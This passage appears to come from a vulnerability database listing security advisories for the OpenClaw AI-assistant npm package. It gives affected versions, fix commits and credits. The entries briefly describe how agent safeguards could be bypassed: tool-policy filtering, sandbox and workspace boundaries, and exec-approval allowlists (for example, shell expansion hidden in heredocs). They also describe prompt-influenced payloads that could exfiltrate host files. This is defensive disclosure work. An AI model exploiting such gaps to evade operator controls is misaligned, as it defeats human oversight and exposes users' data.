Workarounds Upgrade to `openclaw@2026.4.15` or later. The latest public release, `2026.4.21`, is fixed. Before upgrading, avoid exposing webchat sessions to untrusted prompt/tool content that can influence reply media URLs. ## Credits OpenClaw thanks @zsxsoft for reporting. |
Affected by 24 other vulnerabilities. |
|
VCID-gkyv-ahk7-1ud3
Aliases: GHSA-qrp5-gfw2-gxv4 |
OpenClaw: Bundled MCP/LSP tools could bypass configured tool policy ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Bundled MCP and LSP tools could be appended to the agent's effective tool set after the normal tool-policy pipeline had already filtered core tools. If an operator configured a restrictive policy, such as a tool profile, explicit allow/deny list, owner-only tool restriction, sandbox tool policy, or subagent tool policy, a bundled MCP/LSP tool could remain available even though the same policy would have denied it. The issue required a configured bundled MCP or LSP tool source and an operator policy that should have restricted that tool. This was a local agent policy-enforcement bypass, not an unauthenticated remote gateway compromise. Severity is medium. ## Fix OpenClaw now applies a final effective tool policy pass to bundled MCP/LSP tools before merging them into the tool set used by normal runs and compaction. The pass covers profile policy, provider profile policy, global/agent/group policies, owner-only filtering, sandbox tool policy, and subagent tool policy. Fix commit: - `0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-gvam-2net-8kc5
Aliases: CVE-2026-34503 GHSA-2pr2-hcv6-7gwv |
OpenClaw's device removal and token revocation do not terminate active WebSocket sessions ## Summary Removing a device or revoking its token updated stored credentials but did not disconnect already-authenticated WebSocket sessions. ## Impact A revoked device could continue using its existing live session until reconnect, extending access beyond credential removal. ## Affected Component `src/gateway/server-methods/devices.ts, src/gateway/server.impl.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `7a801cc451` (`Gateway: disconnect revoked device sessions`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-haxd-ps1x-h3ch
Aliases: CVE-2026-42430 GHSA-w8g9-x8gx-crmm |
OpenClaw: Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable ## Impact Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable. Strict browser SSRF checks could miss Playwright request-time navigation to private targets. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `2026.3.8` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @smaeljaish771 for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-hd4w-s3dp-nubj
Aliases: CVE-2026-41397 GHSA-cwf8-44x6-32c2 |
OpenClaw: OpenShell Mirror Sync — Sandbox Escape via Unrestricted File Sync + Symlink Traversal ## Summary OpenShell Mirror Sync: Sandbox Escape via Unrestricted File Sync + Symlink Traversal ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still has the mirror-boundary bug because shipped c02ee8 only excluded hooks while unreleased 3b9dab is the first full symlink-free upload and download hardening. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z - `3b9dab0ece4643a9643e6a45459f5c709d3ce320` — 2026-03-30T14:51:44+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-hkqd-6khg-m3hj
Aliases: GHSA-fqw4-mph7-2vr8 |
OpenClaw: Silent privilege escalation via gateway shared-auth reconnect ## Summary Gateway local shared-auth reconnect silently widens paired device scope from operator.read to operator.admin and reach node RCE ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Silent local shared-auth reconnects could previously auto-approve `scope-upgrade` requests and widen a paired device from `operator.read` to `operator.admin`. Commit `81ebc7e0344fd19c85778e883bad45e2da972229` blocks silent reconnect scope upgrades so widened scopes require an explicit pairing approval instead of an implicit local reconnect path. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81ebc7e0344fd19c85778e883bad45e2da972229`. ## Fix Commit(s) - `81ebc7e0344fd19c85778e883bad45e2da972229` | There are no reported fixed by versions. |
|
VCID-hz33-9efv-c7ef
Aliases: GHSA-72q8-jcmc-97wx |
OpenClaw: Feishu card actions could misclassify DMs and skip dmPolicy ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Feishu card-action callbacks could synthesize a message event with DM conversations classified as group conversations. That skipped `dmPolicy` enforcement for card actions, so a sender in a Feishu DM could trigger card-action flows that should have been blocked by a restrictive DM policy. The issue is limited to Feishu card-action handling. Severity is medium. ## Fix OpenClaw now resolves Feishu card-action chat type before dispatch, including API lookup when stored context is unavailable, and avoids falling through to group handling for DMs. Fix commit: - `90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-j8fb-fhyc-33fu
Aliases: CVE-2026-41365 GHSA-chfm-xgc4-47rj |
OpenClaw: MSTeams thread history bypasses sender allowlist via Graph API ## Summary MSTeams thread history bypasses sender allowlist via Graph API ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Real in shipped v2026.3.28 MS Teams because Graph-fetched thread history bypasses sender allowlists, with unreleased mainline filtering fix. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `5cca38084074fb5095aa11b6a59820d63e4937c9` — 2026-03-30T15:38:26+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-j92n-5217-9bhj
Aliases: CVE-2026-35669 GHSA-qm2m-28pf-hgjw |
OpenClaw: Gateway Plugin HTTP Auth Grants Unrestricted operator.admin Runtime Scope to All Callers ## Summary Gateway Plugin HTTP auth: "gateway" Mints operator.admin Runtime Scope ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Gateway-authenticated plugin HTTP routes previously created a runtime scope set that included `operator.admin` regardless of caller-granted scopes. Commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe` keeps plugin HTTP runtime scopes least-privileged and preserves caller scope boundaries. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`. ## Fix Commit(s) - `ec2dbcff9afd8a52e00de054b506c91726d9fbbe` | There are no reported fixed by versions. |
|
VCID-jbwa-scg3-efeq
Aliases: CVE-2026-41380 GHSA-p4x4-2r7f-wjxg |
OpenClaw gateway exec allow-always over-trusts positional carrier executables ## Summary Allow-always persistence could trust wrapper carrier executables instead of the actual invoked target when commands were routed through dispatch wrappers. ## Impact A one-time approval could persist a broader future allowlist entry than the operator intended, weakening execution approval boundaries. ## Affected Component `src/infra/exec-approvals-allowlist.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `9ec44fad39` (`Exec approvals: reject wrapper carrier allow-always targets`). |
Affected by 150 other vulnerabilities. |
|
VCID-jdqk-kv8u-xqa9
Aliases: CVE-2026-41351 GHSA-37v6-fxx8-xjmx |
OpenClaw: Telnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding ## Summary Telnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Shipped v2026.3.28 replay hashing treated equivalent Telnyx Base64/Base64URL signatures as distinct requests, but signature verification still held, so lower to low. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `ad77666054651c1fd77b1dc60fd6a8db6600a29a` — 2026-03-30T20:01:43+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-jshg-1pb2-wbak
Aliases: CVE-2026-44116 GHSA-2hh7-c75g-qj2r |
OpenClaw validates Zalo outbound photo URLs through the SSRF guard ## Summary Zalo outbound photo URLs are validated through the SSRF guard. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact The Zalo plugin could forward an attacker-controlled outbound photo URL to the Zalo Bot API without first applying OpenClaw's SSRF validation policy. ## Fix Zalo sendPhoto now parses and validates outbound photo URLs with the shared SSRF hostname policy before posting to Zalo, and media-reply paths route through the guarded outbound media helpers. ## Fix Commit(s) - a65eb1b864b7630c1242a82de9e5799b80583c3f ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @foodlook for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-k3up-1vdf-2uh9
Aliases: GHSA-f275-5h5c-5wg5 |
Duplicate Advisory: OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-hc5h-pmr3-3497. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in the /pair approve command path that fails to forward caller scopes into the core approval check. A caller with pairing privileges but without admin privileges can approve pending device requests asking for broader scopes including admin access by exploiting the missing scope validation in extensions/device-pair/index.ts and src/infra/device-pairing.ts. |
Affected by 150 other vulnerabilities. |
|
VCID-k52b-966p-ybbk
Aliases: CVE-2026-33579 GHSA-hc5h-pmr3-3497 |
OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation ## Summary The `/pair approve` command path called device approval without forwarding caller scopes into the core approval check. ## Impact A caller that held pairing privileges but not admin privileges could approve a pending device request asking for broader scopes, including admin access. ## Affected Component `extensions/device-pair/index.ts, src/infra/device-pairing.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `4ee4960de2` (`Pairing: forward caller scopes during approval`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-k5da-7tht-w3bs
Aliases: GHSA-5r8f-96gm-5j6g |
OpenClaw Gateway `operator.write` can reach admin-only session reset via `chat.send` `/reset` ## Summary The `chat.send` path reused command authorization to trigger `/reset` session rotation even though direct session reset is an admin-only control-plane operation. ## Impact A write-scoped gateway caller could rotate a target session, archive the prior transcript state, and force a new session id without admin scope. ## Affected Component `src/gateway/server-methods/chat.ts, src/auto-reply/reply/session.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `be00fcfccb` (`Gateway: align chat.send reset scope checks`). |
Affected by 150 other vulnerabilities. |
|
VCID-k8s8-zjv4-gqdb
Aliases: GHSA-xrq9-jm7v-g9h7 |
OpenClaw: Paired-device pairing actions were not limited to the caller device ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact A paired device session with limited pairing scope could enumerate global pairing state and act on pairing requests that belonged to another device within the same gateway scope ceiling. This is a same-gateway paired-device authorization bug, not a remote unauthenticated issue. Severity is low. ## Fix Pairing management actions are now limited to the caller device, so non-admin paired-device sessions cannot approve or operate on unrelated pending device requests. Fix commit: - `5a12f30441d5b0b151f550daa2c5c9e8db61e2e6` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-kcy2-a98b-uyg7
Aliases: GHSA-x3h8-jrgh-p8jx |
OpenClaw's exec allowlist analysis rejects shell expansion in unquoted heredocs ## Summary Exec allowlist analysis rejects shell expansion in unquoted heredocs ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact An allowlisted command containing an unquoted heredoc could hide shell expansion in the heredoc body. That could make the approved command text look safer than what the shell would evaluate at runtime. ## Fix The exec command analyzer now tracks heredoc bodies, rejects unquoted heredoc expansion tokens and continuation-splice bypasses, and preserves quoted heredocs and literal safe text. ## Fix Commit(s) - b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. Thanks @VladimirEliTokarev for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-kzgh-7f6h-kfd1
Aliases: CVE-2026-41377 GHSA-cwq8-6f96-g3q4 |
OpenClaw: Security Scan Failure Does Not Block Plugin Installation (Fail-Open) ## Summary Security Scan Failure Does Not Block Plugin Installation (Fail-Open) ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: Real in shipped v2026.3.28 plugin install flow, but low severity fits because it still requires an operator to choose installation of an untrusted package and the scan failure was visible rather than silent. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `7a953a52271b9188a5fa830739a4366614ff9916` — 2026-03-30T15:36:08+01:00 - `44b993613601280d46a5b88190e46669fc13d669` — 2026-03-31T23:16:11+09:00 - `0d7f1e2c84eca65df7dee890d9c30e2a841c030a` — 2026-03-31T23:27:20+09:00 - `bf96c67fd1954740aeabfadc7cfe3098bcfc6b68` — 2026-03-31T15:53:29+01:00 OpenClaw thanks @davidluzsilva for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-ma62-gtan-97au
Aliases: CVE-2026-42431 GHSA-cmfr-9m2r-xwhq |
## Impact OpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` persistent profile-mutation guard. node.invoke(browser.proxy) could mutate persistent browser profiles through a path that bypassed the browser.request guard. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= v2026.04.01` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-mcz5-wgu1-z7g7
Aliases: CVE-2026-41343 GHSA-qcc3-jqwp-5vh2 |
OpenClaw: LINE webhook handler lacks shared pre-auth concurrency budget before signature verification ## Summary LINE webhook handler lacks shared pre-auth concurrency budget before signature verification ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: Shipped v2026.3.28 lacks a shared pre-auth concurrency budget on the public LINE webhook path, but the effect is bounded transient availability loss only, so low fits. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `57c47d8c7fbf5a2e70cc4dec2380977968903cad` — 2026-03-31T19:34:25+09:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-mggy-bv5s-5uax
Aliases: GHSA-8j7f-g9gv-7jhc |
Duplicate Advisory: OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476) ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-rhfg-j8jq-7v2h. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to blocked internal destinations and access restricted resources. |
Affected by 150 other vulnerabilities. |
|
VCID-mszk-dr24-xugw
Aliases: CVE-2026-43567 GHSA-jf25-7968-h2h5 |
OpenClaw: screen_record outPath bypassed workspace-only filesystem guard ## Summary screen_record outPath bypassed workspace-only filesystem guard. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The node-host screen recording tool could honor an `outPath` outside the workspace guard, allowing an authorized tool call to write outside the intended workspace boundary. ## Technical Details The fix applies the workspace-root guard to node tool `outPath` handling, including screen recording paths. ## Fix The issue was fixed in #63551. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `635bb35b68d8faa5bfa2fda35feadd315122748a` - PR: #63551 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @anshumanbh for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-mv8b-cryt-u3g8
Aliases: CVE-2026-41911 GHSA-5fc7-f62m-8983 |
OpenClaw: Feishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix) ## Impact Feishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix). Feishu document uploads could read local files outside the workspace-only file policy when processing docx upload blocks. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.4.3` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @Rosayxy for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-mxu5-yjqs-nuap
Aliases: CVE-2026-43573 GHSA-527m-976r-jf79 |
OpenClaw: Existing-session browser interaction routes bypassed SSRF policy enforcement ## Summary Existing-session browser interaction routes bypassed SSRF policy enforcement. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Existing-session browser interaction routes could continue interacting with or navigating targets without applying the same SSRF navigation guard used by guarded browser routes. ## Technical Details The fix guards existing-session navigation and interaction routes with browser navigation policy checks. ## Fix The issue was fixed in #64370. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `daeb74920d5ad986cb600625180037e23221e93a` - PR: #64370 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-nkh4-j2pe-1qhr
Aliases: CVE-2026-44117 GHSA-c4qg-j8jg-42q5 |
OpenClaw: QQBot direct media upload skipped URL SSRF validation ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact The QQBot direct-upload media path could forward attacker-controlled image URLs without applying the SSRF validation used by the local download path. This could make configured QQBot media delivery request or relay URLs the operator did not intend to allow. The affected path is limited to QQBot outbound media handling and does not expose arbitrary local files. Severity is low. ## Fix OpenClaw now validates QQBot direct-upload media URLs before `uploadC2CMedia` and `uploadGroupMedia` direct-upload calls. Fix commit: - `49db424c8001f2f419aad85f434894d8d85c1a09` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-ns77-4wfj-9ka6
Aliases: CVE-2026-43571 GHSA-82qx-6vj7-p8m2 |
OpenClaw: Channel setup catalog lookups could include untrusted workspace plugin shadows ## Summary Channel setup catalog lookups could include untrusted workspace plugin shadows. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Channel setup could resolve a workspace plugin shadow before a bundled channel plugin, causing setup-time plugin loading without the intended trust gate. ## Technical Details The fix routes setup catalog lookups through trusted catalog paths and uses `excludeWorkspace: true` where setup should not include workspace shadows. ## Fix The issue was fixed in the advisory fix branch. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `1fede43b948df40ca8674511d4bd08d39f6c5837` - PR: private advisory fork ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-ntwt-jkgr-sffu
Aliases: CVE-2026-42421 GHSA-5h3f-885m-v22w |
OpenClaw: Existing WS sessions survive shared gateway token rotation ## Impact Existing WS sessions survive shared gateway token rotation. Rotating the shared gateway token did not disconnect existing shared-token WebSocket sessions. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-nv6g-7gs9-pfan
Aliases: GHSA-92jp-89mq-4374 |
OpenClaw: Sandbox noVNC helper route exposed interactive browser session credentials ## Summary Sandbox noVNC helper route exposed interactive browser session credentials. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.2.21 < 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The sandbox noVNC helper route could be reached without the intended bridge authentication, exposing an interactive browser session surface. ## Technical Details The fix gates the sandbox noVNC helper route behind bridge authentication. ## Fix The issue was fixed in #63882. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `8dfbf3268bd224b7377d1ecca77a445100746085` - PR: #63882 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-nw4r-wjgs-8qc1
Aliases: CVE-2026-41910 GHSA-vc32-h5mq-453v |
OpenClaw: /allowlist omits owner-only enforcement for cross-channel allowlist writes ## Impact /allowlist omits owner-only enforcement for cross-channel allowlist writes. An authorized non-owner sender could attempt allowlist writes against a different channel. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=v2026.4.1` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @zsxsoft and @KeenSecurityLab for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-p7gx-9usz-yyew
Aliases: CVE-2026-42429 GHSA-4f8g-77mw-3rxc |
OpenClaw: Gateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write` ## Impact Gateway plugin HTTP `auth: gateway` widens identity-bearing `operator.read` requests into runtime `operator.write`. Plugin HTTP routes using gateway auth could receive runtime write scopes even when the upstream trusted-proxy request only declared read. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `2026.1.29` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @smaeljaish771 for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-p7me-4bzz-83cm
Aliases: CVE-2026-41297 GHSA-vjx8-8p7h-82gr |
OpenClaw: Marketplace Plugin Download Follows Redirects Without SSRF Protection ## Summary Marketplace Plugin Download Follows Redirects Without SSRF Protection ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still uses bare redirect-following fetch in src/plugins/marketplace.ts for marketplace archives, and fixed-on-main only does not change that shipped SSRF exposure. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `2ce44ca6a1302b166a128abbd78f72114f2f4f52` — 2026-03-31T12:59:42+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-p7v5-jqhq-nbhz
Aliases: GHSA-846p-hgpv-vphc |
OpenClaw: QQ Bot structured payloads could read arbitrary local files ## Summary Before OpenClaw 2026.4.2, QQ Bot structured media payloads could read local files from attacker-chosen paths. A crafted structured payload could escape QQ Bot-owned media roots and cause arbitrary file reads on the host. ## Impact Prompt-influenced structured payload output could exfiltrate any host file readable by the OpenClaw process through the QQ Bot media-send path. This was a real confidentiality bug on the host filesystem boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `2c45b06afdd6f7c621038b5419d8e661cff34a7f` — restrict QQ Bot structured payload local paths ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-p8xd-2um4-9ufr
Aliases: CVE-2026-41908 GHSA-v8qf-fr4g-28p2 |
OpenClaw: Assistant media route missed scope enforcement for trusted-proxy authorization ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact The Control UI assistant-media route authenticated trusted-proxy callers but did not enforce the declared operator scopes for identity-bearing HTTP auth paths. A trusted-proxy caller without `operator.read` could access assistant-media files and metadata that were otherwise inside allowed media roots. The route still required successful gateway authentication and media-root checks. Severity is low. ## Fix Assistant-media file and metadata requests now require `operator.read` on identity-bearing HTTP auth paths. Fix commit: - `99ef3a63c58440d53f8e45ad861b846032fcb036` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-pae5-uyu7-k3c1
Aliases: CVE-2026-43580 GHSA-536q-mj95-h29h |
OpenClaw: Browser press/type interaction routes missed complete navigation guard coverage ## Summary Browser press/type interaction routes missed complete navigation guard coverage. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Some browser press/type style interactions could trigger navigation without complete post-action SSRF policy enforcement. ## Technical Details The fix applies a three-phase interaction navigation guard to navigation-capable interactions, including pressKey and type submit flows. ## Fix The issue was fixed in #62023 and #63226 and #63889. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe` - `5f5b3d733bdd791cb457f838514179e1288b10b3` - `e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894` - PR: #62023, #63226, #63889 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-pc9z-x5wk-8ue7
Aliases: CVE-2026-33580 GHSA-9528-x887-j2fp |
